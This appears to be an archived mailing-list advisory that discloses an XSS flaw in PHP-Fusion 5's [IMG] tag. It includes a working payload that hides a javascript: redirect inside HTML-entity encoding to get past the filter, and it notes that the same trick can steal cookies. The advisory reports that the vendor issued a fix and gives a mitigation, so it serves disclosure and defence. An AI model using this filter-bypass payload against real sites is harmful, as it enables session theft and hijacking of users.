<<< Date Index >>>     <<< Thread Index >>>

PHP-FUSION 5.* XSS VULNERABILITY




I found an exploit in the current version of php-fusion which allows you to 
input XSS in the [IMG] tag. I reported it already to php-fusion and they 
created a fix for this. Here it goes:

By converting the text (ie. javascript:alert('test')) to their ascii values, 
the strings between the [img][/img] tags aren't checked by the filter. And this 
way, you can send it and it will be executed.

You can do other things like display cookies, steal cookies, redirections etc.

EXAMPLE:

[IMG]javascript:document.location='http://www.albinoblacksheep.com/flash/you.html'[/IMG]

would be replaced by

[IMG]&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#100&#111&#99&#117&#109&#101&#110&#116&#46&#108&#111&#99&#97&#116&#105&#111&#110&#61&#39&#104&#116&#116&#112&#58&#47&#47&#119&#119&#119&#46&#97&#108&#98&#105&#110&#111&#98&#108&#97&#99&#107&#115&#104&#101&#101&#112&#46&#99&#111&#109&#47&#102&#108&#97&#115&#104&#47&#121&#111&#117&#46&#104&#116&#109&#108&#39[/IMG]

FIX:

Filter out characters like '&' and '#'.